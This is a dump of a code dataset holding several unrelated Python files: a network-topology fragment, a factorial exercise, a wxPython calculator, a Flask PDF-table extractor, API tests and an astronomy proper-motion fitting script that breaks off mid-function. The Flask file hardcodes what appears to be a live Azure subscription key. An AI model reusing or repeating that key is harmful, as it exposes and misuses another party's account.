int(tokens[1]), int(tokens[2])\n link = list(sorted([node1, node2]))\n node1_ins = self.add_node(node1)\n node2_ins = self.add_node(node2)\n node1_ins.connect(node2_ins, {'w': w})\n node2_ins.connect(node1_ins, {'w': w})\n self.link_list.append((link[0], link[1]))","repo_name":"chenzibin2019/incremental-network-verification","sub_path":"topo/ospf.py","file_name":"ospf.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"35752921909","text":"'''\nExtra Long Factorials\nQuestion: https://www.hackerrank.com/challenges/extra-long-factorials/problem\n'''\nimport sys\n\ndef extraLongFactorials(n):\n # Complete this function\n fact=n\n while n!=1:\n fact=fact * (n-1)\n n=n-1\n print (fact)\n\nif __name__ == \"__main__\":\n n = int(input().strip())\n extraLongFactorials(n)\n","repo_name":"abhijitbangera/hackerrank_python","sub_path":"Medium_Extra_Long_Factorials.py","file_name":"Medium_Extra_Long_Factorials.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"75240716167","text":"# -*- coding: utf-8 -*-\n# @Author: Administrator\n# @Date: 2020-02-25 12:18:05\n# @Last Modified by: Administrator\n# @Last Modified time: 2020-02-25 12:18:05\n\nimport math;\n\nimport wx;\n\nfrom _Global import _GG;\nfrom function.base import *;\n\nfrom enum import Enum, unique;\n\n@unique\nclass CalcType(Enum):\n\tCalcOp\t= 0; # 计算操作\n\tConst\t= 1; # 常数\n\tSingle\t= 2; # 单参数运算\n\tDouble\t= 3; # 双参数运算\n\tOperate\t= 4; # 双参数运算\n\tBkLeft\t= 5; # 括号(左)\n\tBkRight\t= 6; # 括号(右)\n\tComma\t= 7; # 逗号\n\tDot\t\t= 8; # 句号\n\n\n# 阶乘\ndef factorial(val):\n\treturn math.factorial(int(val));\n\n# 组合\ndef combine(m, n):\n\tif m < 0 or n < 0:\n\t\traise ValueError(\"C(x,y) only accepts non negative numbers!\");\n\tif m > n:\n\t\traise ValueError(\"C(x,y) only allow x < y!\");\n\treturn factorial(n) / (factorial(m) * factorial(n-m));\n\n# 排列\ndef arrange(m, n):\n\tif m < 0 or n < 0:\n\t\traise ValueError(\"C(x,y) only accepts non negative numbers!\");\n\tif m > n:\n\t\traise ValueError(\"C(x,y) only allow x < y!\");\n\treturn factorial(n) / factorial(n-m);\n\nitemConfig = [\n\t{\"val\" : \"CL\", \"normalColor\" : wx.Colour(205, 155, 155), \"enterColor\" : wx.Colour(205, 96, 96), \"func\" : \"clear\", \"type\" : CalcType.CalcOp},\n\t{\"val\" : \"asin\", \"normalColor\" : wx.Colour(240, 240, 240), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.asin(\", \"fmt\" : \"asin(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"acos\", \"normalColor\" : wx.Colour(240, 240, 240), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.acos(\", \"fmt\" : \"acos(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"atan\", \"normalColor\" : wx.Colour(240, 240, 240), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.atan(\", \"fmt\" : \"atan(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"<\", \"normalColor\" : wx.Colour(205, 186, 150), \"enterColor\" : wx.Colour(205, 149, 12), \"func\" : \"delete\", \"type\" : CalcType.CalcOp},\n\t\n\t{\"val\" : \"e\", \"normalColor\" : wx.Colour(210, 250, 210), \"enterColor\" : wx.Colour(156, 250, 156), \"func\" : \"math.e\", \"fmt\" : \"e\", \"type\" : CalcType.Const},\n\t{\"val\" : \"sin\", \"normalColor\" : wx.Colour(240, 240, 240), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.sin(\", \"fmt\" : \"sin(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"cos\", \"normalColor\" : wx.Colour(240, 240, 240), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.cos(\", \"fmt\" : \"cos(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"tan\", \"normalColor\" : wx.Colour(240, 240, 240), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.tan(\", \"fmt\" : \"tan(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"Pi\", \"normalColor\" : wx.Colour(210, 250, 210), \"enterColor\" : wx.Colour(156, 250, 156), \"func\" : \"math.pi\", \"fmt\" : \"Pi\", \"type\" : CalcType.Const},\n\t\n\t{\"val\" : \"C(x,y)\", \"normalColor\" : wx.Colour(210, 210, 250), \"enterColor\" : wx.Colour(181, 160, 255), \"func\" : \"combine(\", \"fmt\" : \"C(\", \"type\" : CalcType.Double},\n\t{\"val\" : \"deg\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.degrees(\", \"fmt\" : \"deg(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"rad\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.radians(\", \"fmt\" : \"rad(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"n!\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"factorial(\", \"fmt\" : \"fact(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"%\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"%\", \"fmt\" : \"%\", \"type\" : CalcType.Operate},\n\t\n\t{\"val\" : \"A(x,y)\", \"normalColor\" : wx.Colour(210, 210, 250), \"enterColor\" : wx.Colour(181, 160, 255), \"func\" : \"arrange(\", \"fmt\" : \"A(\", \"type\" : CalcType.Double},\n\t{\"val\" : \"(\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"(\", \"fmt\" : \"(\", \"type\" : CalcType.BkLeft},\n\t{\"val\" : \")\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \")\", \"fmt\" : \")\", \"type\" : CalcType.BkRight},\n\t{\"val\" : \"^\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"**\", \"fmt\" : \"^\", \"type\" : CalcType.Operate},\n\t{\"val\" : \"/\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"/\", \"fmt\" : \"/\", \"type\" : CalcType.Operate},\n\t\n\t{\"val\" : \"|x|\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.fabs(\", \"fmt\" : \"abs(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"7\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"7\", \"fmt\" : \"7\", \"type\" : CalcType.Const},\n\t{\"val\" : \"8\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"8\", \"fmt\" : \"8\", \"type\" : CalcType.Const},\n\t{\"val\" : \"9\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"9\", \"fmt\" : \"9\", \"type\" : CalcType.Const},\n\t{\"val\" : \"*\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"*\", \"fmt\" : \"*\", \"type\" : CalcType.Operate},\n\t\n\t{\"val\" : \"sqrt\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.sqrt(\", \"fmt\" : \"sqrt(\", \"type\" : CalcType.Single},\n\t{\"val\" : \"4\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"4\", \"fmt\" : \"4\", \"type\" : CalcType.Const},\n\t{\"val\" : \"5\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"5\", \"fmt\" : \"5\", \"type\" : CalcType.Const},\n\t{\"val\" : \"6\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"6\", \"fmt\" : \"6\", \"type\" : CalcType.Const},\n\t{\"val\" : \"-\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"-\", \"fmt\" : \"-\", \"type\" : CalcType.Operate},\n\t\n\t{\"val\" : \"log(x, y)\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.log(\", \"fmt\" : \"log(\", \"type\" : CalcType.Double},\n\t{\"val\" : \"1\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"1\", \"fmt\" : \"1\", \"type\" : CalcType.Const},\n\t{\"val\" : \"2\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"2\", \"fmt\" : \"2\", \"type\" : CalcType.Const},\n\t{\"val\" : \"3\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"3\", \"fmt\" : \"3\", \"type\" : CalcType.Const},\n\t{\"val\" : \"+\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"+\", \"fmt\" : \"+\", \"type\" : CalcType.Operate},\n\t\n\t{\"val\" : \"ln\", \"normalColor\" : wx.Colour(230, 230, 230), \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"math.log(\", \"fmt\" : \"ln(\", \"type\" : CalcType.Single},\n\t{\"val\" : \",\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \",\", \"fmt\" : \",\", \"type\" : CalcType.Comma},\n\t{\"val\" : \"0\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \"0\", \"fmt\" : \"0\", \"type\" : CalcType.Const},\n\t{\"val\" : \".\", \"normalColor\" : \"white\", \"enterColor\" : wx.Colour(200, 200, 200), \"func\" : \".\", \"fmt\" : \".\", \"type\" : CalcType.Dot},\n\t{\"val\" : \"=\", \"normalColor\" : wx.Colour(108, 166, 205), \"enterColor\" : wx.Colour(79, 148, 205), \"func\" : \"equal\", \"type\" : CalcType.CalcOp},\n];\n\ndef __getExposeData__():\n\treturn {\n\t\t# \"exposeDataName\" : {},\n\t};\n\ndef __getExposeMethod__(DoType):\n\treturn {\n\t\t\"getItemConfig\" : DoType.Override,\n\t\t\"onInputCalc\" : DoType.Override,\n\t\t\"isBkRightItem\" : DoType.Override,\n\t\t\"isCommaItem\" : DoType.Override,\n\t\t\"getBkRightLackCnt\" : DoType.Override,\n\t\t\"getCommaLackCnt\" : DoType.Override,\n\t};\n\ndef __getDepends__():\n\treturn [\n\t\t# {\n\t\t# \t\"path\" : \"tempBehavior\", \n\t\t# \t\"basePath\" : _GG(\"g_CommonPath\") + \"behavior/\",\n\t\t# },\n\t];\n\nclass CalculatorBehavior(_GG(\"BaseBehavior\")):\n\tdef __init__(self):\n\t\tsuper(CalculatorBehavior, self).__init__(__getDepends__(), __getExposeData__(), __getExposeMethod__, __file__);\n\t\tself._className_ = CalculatorBehavior.__name__;\n\t\tself.__result = \"\";\n\t\tself.__process = \"0\";\n\t\tself.__processList = [];\n\t\tpass;\n\n\t# 默认方法【obj为绑定该组件的对象,argList和argDict为可变参数,_retTuple为该组件的前个函数返回值】\n\t# def defaultFun(self, obj, *argList, _retTuple = None, **argDict):\n\t# \t_GG(\"Log\").i(obj._className_);\n\t# \tpass;\n\n\tdef getItemConfig(self, obj):\n\t\treturn itemConfig;\n\t\n\tdef onInputCalc(self, obj, cfg = {}):\n\t\tif cfg[\"type\"] == CalcType.CalcOp:\n\t\t\tgetattr(self, cfg[\"func\"])(obj, cfg);\n\t\telse:\n\t\t\tif len(self.__processList) == 0:\n\t\t\t\tself.__process = cfg[\"fmt\"];\n\t\t\telse:\n\t\t\t\tself.__process += cfg[\"fmt\"];\n\t\t\tself.__processList.append(cfg);\n\t\treturn self.__result, self.__process;\n\n\tdef getProcess(self):\n\t\treturn \"\".join([p[\"fmt\"] for p in self.__processList]);\n\n\tdef calcProcess(self):\n\t\ttry:\n\t\t\treturn eval(\"\".join([p[\"func\"] for p in self.__processList]));\n\t\texcept Exception as e:\n\t\t\t_GG(\"Log\").d(f\"Failed to calc process! Err[{e}].\");\n\t\treturn None;\n\n\tdef clear(self, obj, cfg = []):\n\t\tself.__processList.clear();\n\t\tself.__result, self.__process, = \"\", \"0\";\n\t\tpass;\n\n\tdef delete(self, obj, cfg = []):\n\t\tif len(self.__processList) > 0:\n\t\t\tself.__processList.pop();\n\t\tif len(self.__processList) == 0:\n\t\t\tself.__process = \"0\";\n\t\telse:\n\t\t\tself.__process = self.getProcess();\n\t\tpass;\n\t\n\tdef equal(self, obj, cfg = []):\n\t\t# 补足右括号\n\t\tbkRightLackCnt = self.getBkRightLackCnt(obj);\n\t\tif bkRightLackCnt > 0:\n\t\t\tfor i in range(bkRightLackCnt):\n\t\t\t\tself.__processList.append({\"func\" : \")\", \"fmt\" : \")\", \"type\" : CalcType.BkRight});\n\t\t# 计算结果\n\t\tret = self.calcProcess();\n\t\tif ret == None:\n\t\t\tself.__process = \"计算失败,请检查输入!\";\n\t\t\tself.__processList.clear();\n\t\telse:\n\t\t\tval = str(ret);\n\t\t\tself.__result = self.getProcess() + \"=\" + val;\n\t\t\tself.__process = val;\n\t\t\tself.__processList = [{\"func\" : val, \"fmt\" : val, \"type\" : CalcType.Const}];\n\t\tpass;\n\n\tdef isBkRightItem(self, obj, cfg = {}):\n\t\treturn cfg.get(\"type\", None) == CalcType.BkRight;\n\n\tdef isCommaItem(self, obj, cfg = {}):\n\t\treturn cfg.get(\"type\", None) == CalcType.Comma;\n\n\tdef getBkRightLackCnt(self, obj):\n\t\treturn self.__process.count(\"(\") - self.__process.count(\")\");\n\t\n\tdef getCommaLackCnt(self, obj):\n\t\tcnt = 0;\n\t\tfor p in self.__processList:\n\t\t\tif p[\"type\"] == CalcType.Double:\n\t\t\t\tcnt += 1;\n\t\treturn cnt - self.__process.count(\",\");","repo_name":"pytoolsip-tools/bcsc","sub_path":"assets/tool/behavior/CalculatorBehavior.py","file_name":"CalculatorBehavior.py","file_ext":"py","file_size_in_byte":10214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"40859580150","text":"from flask import Flask, render_template, request\nimport json\nimport time\nfrom requests import get, post\nimport pandas as pd\nfrom IPython.display import display\napp = Flask(__name__)\n\n\nAPI_version = \"v2.1\"\n\n# Endpoint URL\nendpoint = r\"https://rnd.cognitiveservices.azure.com/\"\napim_key = \"6a920a79fbc2465fa1bc9bd94ef59e7e\"\nmodel_id = \"59deeb47-4548-4764-8dd2-a3e8d64f99f5\"\n#post_url = endpoint + \"/formrecognizer/v2.1/layout/analyze\"\npost_url = endpoint + \"/formrecognizer/%s/custom/models/%s/analyze\" % (API_version, model_id)\n\nheaders = {\n# Request headers\n 'Content-Type': 'application/pdf',\n 'Ocp-Apim-Subscription-Key': apim_key,\n}\n\nparams = {\n \"includeTextDetails\": True,\n \"locale\": \"en-US\"\n}\n\n\n@app.route('/upload_pdf', methods = ['POST'])\ndef extract_pdf():\n print(request.files)\n data_bytes = request.files['pdf'].read()\n errors = {}\n # with open(source, \"rb\") as f:\n # data_bytes = f.read()\n\n try:\n resp = post(url = post_url, data = data_bytes, headers = headers, params = params)\n if resp.status_code != 202:\n print(\"POST analyze failed:\\n%s\" % resp.text)\n quit()\n print(\"POST analyze succeeded:\\n%s\" % resp.headers)\n get_url = resp.headers[\"operation-location\"]\n except Exception as e:\n print(\"POST analyze failed:\\n%s\" % str(e))\n quit()\n\n \n resp_json = None\n df_dataframe = {}\n multiple_table_entries = {}\n final_df = []\n n_tries = 10\n n_try = 0\n wait_sec = 6\n while n_try < n_tries:\n try:\n resp = get(url = get_url, headers = {\"Ocp-Apim-Subscription-Key\": apim_key})\n resp_json = json.loads(resp.text)\n if resp.status_code != 200:\n print(\"GET Receipt results failed:\")\n quit()\n status = resp_json[\"status\"]\n if status == \"succeeded\":\n print(\"Receipt Analysis succeeded:\")\n break\n if status == \"failed\":\n print(\"Analysis failed:\")\n quit()\n # Analysis still running. Wait and retry.\n time.sleep(wait_sec)\n n_try += 1\n except Exception as e:\n msg = \"GET analyze results failed:\\n%s\" % str(e)\n print(msg)\n quit()\n \n if resp_json is not None:\n pd.options.display.max_columns = None\n Exctracted_text=[]\n for read_result in resp_json[\"analyzeResult\"][\"readResults\"]:\n print(\"Page No:%s\" % read_result[\"page\"])\n print(\"---------Page %d: extracted OCR------\" % read_result[\"page\"])\n for line in read_result[\"lines\"]:\n print(line[\"text\"])\n Exctracted_text.append(line[\"text\"])\n\n for pageresult in resp_json[\"analyzeResult\"][\"pageResults\"]:\n # print(\"Page No:%s\" % pageresult[\"page\"])\n\n for table in pageresult[\"tables\"]:\n print(\"--------Page %d Extracted table--------\" % pageresult[\"page\"])\n print(\"Extracted table\")\n print(\"No. of rows %s\" % table[\"rows\"])\n print(\"No. of Columns %s\" % table[\"columns\"])\n tableList = [[None for x in range(table[\"columns\"])] for y in range(table[\"rows\"])]\n for cell in table[\"cells\"]:\n tableList[cell[\"rowIndex\"]][cell[\"columnIndex\"]] = cell[\"text\"]\n # print(\"new table\", tableList)\n df = pd.DataFrame.from_records(tableList)\n df_dataframe = df.to_dict(orient='records')\n df_columns = df.to_dict()\n columns = []\n for key in df_columns:\n columns.append(key)\n final_df.append({'rows':df_dataframe,'columns':columns})\n #print(df)\n \n if 'documentResults' in resp_json[\"analyzeResult\"]:\n print('-------------------------------------------')\n print(resp_json[\"analyzeResult\"][\"documentResults\"])\n multiple_table_entries['document_result'] = resp_json[\"analyzeResult\"][\"documentResults\"]\n \n multiple_table_entries['text'] = Exctracted_text\n multiple_table_entries['multiple_tables'] = final_df\n\n \n return render_template('output.html', errors=errors, results=multiple_table_entries)\n\n@app.route(\"/home\")\ndef fileFrontPage():\n return render_template('fileform.html')\n\nif __name__ == '__main__':\n app.run()","repo_name":"Krishan267/TableExtracter","sub_path":"Table_Converter/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4419323186","text":"import pytest\nimport tempfile\nimport os\nimport json\nimport init_db\n\nfrom myapp import app as my_app\n\n\n@pytest.fixture\ndef client():\n file_handle, file_name = tempfile.mkstemp()\n my_app.app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + file_name\n my_app.app.config['TESTING'] = True\n\n init_db.main()\n client = my_app.app.test_client()\n with my_app.app.app_context():\n my_app.db.init_app(my_app.app)\n\n yield client\n\n os.close(file_handle)\n os.unlink(file_name)\n\n\ndef test_get_export_data_download(client):\n rv = client.get('/EXPORT_DATA_DOWNLOAD')\n assert rv.status_code == 200\n json_data = json.loads(rv.data)\n assert len(json_data) == 6\n for x in json_data:\n assert x[\"SOURCE_TABLE\"] == 'PS_IMBALANCE'\n\n\ndef test_get_export_data_download_run_id(client):\n\n # Invalid run_id\n rv = client.get('/EXPORT_DATA_DOWNLOAD/0000')\n assert rv.status_code == 400\n\n # Valid run_id\n rv = client.get('/EXPORT_DATA_DOWNLOAD/f144ec22-921f-43ff-a93c-189695336580')\n assert rv.status_code == 200\n json_data = json.loads(rv.data)\n assert len(json_data) == 1\n for x in json_data:\n assert 'f144ec22-921f-43ff-a93c-189695336580' == x['RUN_ID']\n\n\ndef test_get_export_data_download_run_id_file_name_source_table(client):\n\n # Invalid run_id, file_name and source data\n rv = client.get('/export_data_download/9e5c1872-3f8e-4ae5-85dc-c67a602d011e/thisisnotafilename9995/thisiswrongdata9995')\n assert rv.status_code == 400\n\n # Valid run_id, file_name and source_data\n rv = client.get('/export_data_download/9e5c1872-3f8e-4ae5-85dc-c67a602d011e/SomethingElse/PS_IMBALANCE')\n assert rv.status_code == 200\n json_data = json.loads(rv.data)\n assert '9e5c1872-3f8e-4ae5-85dc-c67a602d011e' == json_data['RUN_ID']\n assert 'SomethingElse' == json_data['FILENAME']\n assert 'PS_IMBALANCE' == json_data['SOURCE_TABLE']\n\n # Valid run_id\n rv = client.get('/EXPORT_DATA_DOWNLOAD/f144ec22-921f-43ff-a93c-189695336580')\n assert rv.status_code == 200\n json_data = json.loads(rv.data)\n assert len(json_data) == 1\n for x in json_data:\n assert 'f144ec22-921f-43ff-a93c-189695336580' == x['RUN_ID']\n\n\n\ndef test_post_export_data_download(client):\n\n json_data = {'DATE_CREATED': '2018-01-24 12:00:06',\n 'DOWNLOADABLE_DATA': 'RUN_ID,FLOW,SUM_PRIOR_WT,SUM_IMBAL_WT',\n 'FILENAME': 'TEST_FILE_NAME',\n 'RUN_ID': '9e5c1872-3f8e-4ae5-85dc-c67a602d011e',\n 'SOURCE_TABLE': 'IMBALANCE_WEIGHT'}\n\n json_string = json.dumps(json_data)\n print(json_string)\n\n response = client.post('/export_data_download', data=json_string)\n\n assert response.status_code == 201\n\n rv = client.get('/export_data_download')\n\n records = rv.json\n assert len(records) == 7\n\n\n\n","repo_name":"martyncolmer/ips_db_api","sub_path":"tests/test_export_data_download.py","file_name":"test_export_data_download.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34981997494","text":"# -*- coding: utf-8 -*-\n\n# ----------------------------------------------------------------------------\n#\n# PROJECT : JAS1101 Final Project\n#\n# ----------------------------------------------------------------------------\n\n# Docstring\n\"\"\"Get the Proper Motion Scale Size of Each Globular Cluster.\n\nWarnings\n--------\nSEE normalize_pm notebook for exploration of Gaussianity (assumed here)\nbecause it is NOT true.\n\n\nRoutine Listings\n----------------\n\n\"\"\"\n\n__author__ = [\"Nathaniel Starkman\", \"Qing Liu\", \"Vivian Ngo\"]\n\n\n# __all__ = [\n# \"\"\n# ]\n\n\n###############################################################################\n# IMPORTS\n\n# GENERAL\nimport os\nimport pathlib\nimport warnings\nimport argparse\nfrom typing import Optional, Sequence\n\nimport tqdm\n\nimport numpy as np\nimport scipy.stats as stats\n\nimport scipy.optimize as optimize\n\nimport astropy.units as u\nfrom astropy.table import Table, QTable\nfrom astropy.stats import SigmaClip\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# PROJECT-SPECIFIC\n\nfrom .util import gaussfitter\n\n\n###############################################################################\n# PARAMETERS\n\nwarnings.simplefilter(\"always\", UserWarning)\n\n\nDATA = str(pathlib.Path(__file__).parent.absolute()) + \"/data/\"\nFIGURES = str(pathlib.Path(__file__).parent.absolute()) + \"/figures/\"\n\nif not os.path.isdir(FIGURES):\n os.mkdir(FIGURES)\n\n###############################################################################\n# CODE\n###############################################################################\n\n\ndef read_globular_cluster_table(file: str) -> QTable:\n \"\"\"Read GC data table.\n\n Reads the GC table and assigns units\n\n Parameters\n ----------\n file\n\n \"\"\"\n # read table\n df = QTable.read(file, format=\"ascii.commented_header\")\n\n # units dictionary\n units = {\n \"x\": u.deg,\n \"y\": u.deg,\n \"pmx\": u.mas / u.yr,\n \"pmy\": u.mas / u.yr,\n \"pmx_e\": u.mas / u.yr,\n \"pmy_e\": u.mas / u.yr,\n \"g_mag\": u.mag,\n \"bp_rp\": u.mag,\n }\n\n # assign units\n for name, unit in units.items():\n df[name].unit = unit\n\n return df\n\n\n# /def\n\n\n # testing\ndef read_summary_table(file: str) -> QTable:\n \"\"\"Read summary table to be in Astropy format.\n\n Parameters\n ----------\n file: str\n file to read with QTable\n\n Returns\n -------\n df : QTable\n\n \"\"\"\n # read table, in Table format for better editing access\n df = Table.read(file, format=\"ascii.commented_header\")\n df.add_index(\"Name\") # index by name\n\n # units dictionary\n units = {\n \"ra\": u.deg,\n \"dec\": u.deg,\n \"dist\": u.kpc,\n \"vlos\": u.km / u.s,\n \"vloserr\": u.km / u.s,\n \"sigma\": u.km / u.s,\n \"rmax\": u.arcmin,\n \"pmra\": u.mas / u.yr,\n \"pmdec\": u.mas / u.yr,\n \"pmra_e\": u.mas / u.yr,\n \"pmdec_e\": u.mas / u.yr,\n \"rscale\": u.arcmin,\n \"pmdisp\": u.mas / u.yr,\n \"pmscale\": u.mas / u.yr,\n \"pmscale_e\": u.mas / u.yr,\n }\n\n # assign units\n for name, unit in units.items():\n if name in df.columns: # needed b/c creating columns\n df[name].unit = unit\n\n return QTable(df)\n\n\n# /def\n\n# ------------------------------------------------------------------------\n# https://scipy-cookbook.readthedocs.io/items/FittingData.html\n\n\ndef gaussian(\n height: float,\n center_x: float,\n center_y: float,\n width_x: float,\n width_y: float,\n):\n \"\"\"Returns a gaussian function with the given parameters.\n\n Parameters\n ----------\n height : float\n center_x: float\n center_y: float\n width_x: float\n width_y: float\n\n Returns\n -------\n Gaussian: FunctionType\n\n \"\"\"\n width_x = float(width_x)\n width_y = float(width_y)\n\n def Gaussian(x: Sequence, y: Sequence) -> Sequence:\n \"\"\"Gaussian function of x, y with preloaded center and widths.\n\n Parameters\n ----------\n x, y : array-like\n positions\n\n Returns\n -------\n array-like\n\n \"\"\"\n return height * np.exp(\n -(\n ((center_x - x) / width_x) ** 2\n + ((center_y - y) / width_y) ** 2\n )\n / 2\n )\n\n # /def\n\n return Gaussian\n\n\n# /def\n\n\ndef moments(data):\n \"\"\"Returns (height, x, y, width_x, width_y)\n the gaussian parameters of a 2D distribution by calculating its\n moments \"\"\"\n total = data.sum()\n X, Y = np.indices(data.shape)\n x = (X * data).sum() / total\n y = (Y * data).sum() / total\n col = data[:, int(y)]\n width_x = np.sqrt(\n np.abs((np.arange(col.size) - y) ** 2 * col).sum() / col.sum()\n )\n row = data[int(x), :]\n width_y = np.sqrt(\n np.abs((np.arange(row.size) - x) ** 2 * row).sum() / row.sum()\n )\n height = data.max()\n return height, x, y, width_x, width_y\n\n\n# /def\n\n\ndef fitgaussian(data):\n \"\"\"Returns (height, x, y, width_x, width_y)\n the gaussian parameters of a 2D distribution found by a fit\"\"\"\n params = moments(data)\n errorfunction = lambda p: np.ravel(\n gaussian(*p)(*np.indices(data.shape)) - data\n )\n p, cov, infodict, *errmsg = optimize.leastsq(\n errorfunction, params, full_output=True\n )\n return p, cov, infodict, errmsg\n\n\n# /def\n\n\n# ------------------------------------------------------------------------\n\n\ndef scale_values_2d(name, df, threshold=0.8, sigma=4):\n \"\"\"scale_values_2d\n\n Use Sturge’s Rule to determine number of bins\n\n TODO\n ----\n don't choose arbitrary threshold\n don't use histogram?\n not arbitrary rotation threshold\n\n \"\"\"\n\n ismember = df[\"memberprob\"] > threshold\n\n pmx = df[\"pmx\"][ismember].to_value(\"mas / yr\")\n pmy = df[\"pmy\"][ismember].to_value(\"mas / yr\")\n\n # Sigma Clip major outliers\n\n sigclip = SigmaClip(sigma=sigma, maxiters=1.0)\n resx = sigclip(pmx)\n resy = sigclip(pmy)\n\n pmx = resx.data[~resx.mask & ~resy.mask]\n pmy = resy.data[~resx.mask & ~resy.mask]\n\n # -----------\n # plot normality test\n\n fig, (ax0, ax1) = plt.subplots(1, 2, figsize=(6, 3))\n stats.probplot(pmx, dist=\"norm\", plot=ax0)\n stats.probplot(pmy, dist=\"norm\", plot=ax1)\n plt.tight_layout()\n plt.savefig(FIGURES + f\"{name}_QQ.pdf\")\n plt.close()\n\n # -----------\n\n # Now histogram\n # need equi-spaced bins\n # TODO error estimate from bin size\n\n data, *edges = np.histogram2d(\n pmx, pmy, bins=int(1 + 3.222 * np.log(len(pmx))), density=True\n )\n\n # fit 2D Gaussian, with freedom of rotation\n params, cov, infodict, errmsg = gaussfitter.gaussfit(\n data, circle=0, rotate=1, vheight=1, return_all=1\n )\n\n height, amp, x, y, width_x, width_y, rota = params\n\n labels = (\"height\", \"amp\", \"x\", \"y\", \"width_x\", \"width_y\", \"rota\")\n\n # Check if need to do a rotated system. get better results if don't.\n if rota < 2: # not rotated\n amp = None\n rota = 0\n params, cov, infodict, errmsg = fitgaussian(data)\n height, x, y, width_x, width_y = params\n\n labels = (\"height\", \"x\", \"y\", \"width_x\", \"width_y\")\n\n # -----------\n # plot 2D Gaussian\n\n plt.matshow(data, cmap=plt.cm.gist_earth_r)\n\n if rota == 0:\n fit = gaussian(*params)\n else:\n fit = gaussfitter.twodgaussian(params, circle=0, rotate=1, vheight=1)\n\n plt.contour(fit(*np.indices(data.shape)), cmap=plt.cm.copper)\n ax = plt.gca()\n\n rota %= 360 # shift back to 0 - 360 degree rotation\n\n plt.text(\n 0.95,\n 0.05,\n \"\"\"\n x : %.1f\n y : %.1f\n rot : %.1f\n width_x : %.1f\n width_y : %.1f\"\"\"\n % (x, y, rota, width_x, width_y),\n fontsize=16,\n horizontalalignment=\"right\",\n verticalalignment=\"bottom\",\n transform=ax.transAxes,\n )\n plt.savefig(FIGURES + f\"{name}_2D.pdf\")\n plt.close()\n\n # -----------\n\n if cov is not None:\n\n sns.heatmap(np.log10(np.abs(cov)), cmap=\"viridis_r\")\n plt.xticks(plt.xticks()[0], labels)\n plt.yticks(plt.yticks()[0], labels)\n plt.savefig(FIGURES + f\"{name}_cov.pdf\")\n plt.close()\n\n # -----------\n\n return width_x, width_y, cov, labels, edges\n\n\n# /def\n\n\n# ------------------------------------------------------------------------\n\n\ndef average_scale_value(width_x, width_y, edges_x, edges_y):\n\n flag = False\n\n if not 